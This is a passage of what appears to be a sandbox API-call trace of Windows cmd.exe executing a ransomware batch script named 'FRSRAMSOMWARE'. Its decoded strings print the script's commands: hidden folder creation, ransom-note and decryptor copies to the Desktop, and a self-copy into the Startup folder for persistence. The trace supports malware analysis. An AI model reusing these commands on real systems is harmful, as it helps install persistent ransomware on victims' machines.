hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0128.067] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.067] GetFileType (hFile=0x2e8) returned 0x1 [0128.067] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0128.067] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.067] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0128.067] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0128.067] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0128.067] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.067] GetFileType (hFile=0x2e8) returned 0x1 [0128.067] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0128.068] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.068] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0128.068] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0128.068] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0128.068] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.068] GetFileType (hFile=0x2e8) returned 0x1 [0128.068] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0128.068] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.068] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0128.068] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0128.068] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0128.068] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.068] GetFileType (hFile=0x2e8) returned 0x1 [0128.068] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0128.068] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.068] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0128.068] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0128.068] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0128.068] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.068] GetFileType (hFile=0x2e8) returned 0x1 [0128.068] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0128.068] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.068] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0128.068] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0128.068] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0128.068] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.068] GetFileType (hFile=0x2e8) returned 0x1 [0128.068] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0128.069] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.069] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0128.069] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0128.069] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0128.069] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.069] GetFileType (hFile=0x2e8) returned 0x1 [0128.069] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0128.069] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.069] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0128.069] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0128.069] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0128.069] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.069] GetFileType (hFile=0x2e8) returned 0x1 [0128.069] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0128.069] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.069] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0128.069] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0128.069] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0128.069] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.069] GetFileType (hFile=0x2e8) returned 0x1 [0128.069] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0128.069] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.069] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0128.069] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0128.069] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0128.069] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.069] GetFileType (hFile=0x2e8) returned 0x1 [0128.069] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0128.069] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.069] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0128.070] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0128.070] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0128.070] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.070] GetFileType (hFile=0x2e8) returned 0x1 [0128.070] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0128.070] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.070] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0128.070] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0128.070] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0128.070] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.070] GetFileType (hFile=0x2e8) returned 0x1 [0128.070] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0128.070] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.070] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0128.070] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0128.070] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0128.070] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.070] GetFileType (hFile=0x2e8) returned 0x1 [0128.070] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0128.070] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.070] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0128.070] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0128.070] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0128.070] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.070] GetFileType (hFile=0x2e8) returned 0x1 [0128.070] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0128.070] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.070] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0128.070] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0128.070] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0128.071] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.071] GetFileType (hFile=0x2e8) returned 0x1 [0128.071] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0128.071] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.071] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0128.071] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0128.071] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0128.071] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.071] GetFileType (hFile=0x2e8) returned 0x1 [0128.071] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0128.071] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0128.071] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0128.071] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0128.071] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0128.071] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.071] GetFileType (hFile=0x2e8) returned 0x1 [0128.071] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0128.071] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0128.071] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0128.071] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0128.071] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0128.071] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.071] GetFileType (hFile=0x2e8) returned 0x1 [0128.071] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0128.071] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0128.071] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0128.071] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0128.071] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0128.071] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.071] GetFileType (hFile=0x2e8) returned 0x1 [0128.072] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0128.072] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0128.072] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0128.072] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0128.072] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0128.072] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.072] GetFileType (hFile=0x2e8) returned 0x1 [0128.072] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0128.072] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0128.072] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0128.072] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0128.072] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0128.072] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.072] GetFileType (hFile=0x2e8) returned 0x1 [0128.072] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0128.072] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0128.072] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0128.072] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0128.072] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0128.072] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.072] GetFileType (hFile=0x2e8) returned 0x1 [0128.072] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0128.072] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0128.072] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0128.072] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0128.072] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0128.072] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.072] GetFileType (hFile=0x2e8) returned 0x1 [0128.072] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0128.073] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0128.073] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 